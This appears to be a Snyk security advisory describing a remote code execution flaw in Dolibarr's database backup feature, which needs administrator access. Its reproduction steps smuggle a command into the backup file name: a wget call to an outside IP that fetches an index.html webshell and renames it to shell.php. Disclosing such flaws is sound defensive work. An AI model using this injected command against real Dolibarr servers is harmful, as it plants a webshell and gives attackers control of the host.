Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Remote Code Execution (RCE) vulnerabilities in an interactive lesson.
Start learningA fix was pushed into the master
branch but not yet published.
dolibarr/dolibarr is a modern and easy to use web software to manage your business.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the dumpDatabase
function due to missing input sanitisation, allowing an attacker to execute arbitrary code via a crafted command/script.
Note: This is only exploitable if the attacker has administrator privileges.
Add a new file named index.html containing a webshell.
Expose the newly created file on the root folder of a web server.
Go to the backup feature on Dolibarr and select the “mysqldump” export method.
Select the “lowmemorydump” method to hit the vulnerable section.
Put the payload as the export file name (e.g. wget 192.168.1.167 && mv index.html shell.php
).
Click on generate backup.
Once done, the webshell should be found in htdocs/admin/tools/shell.php.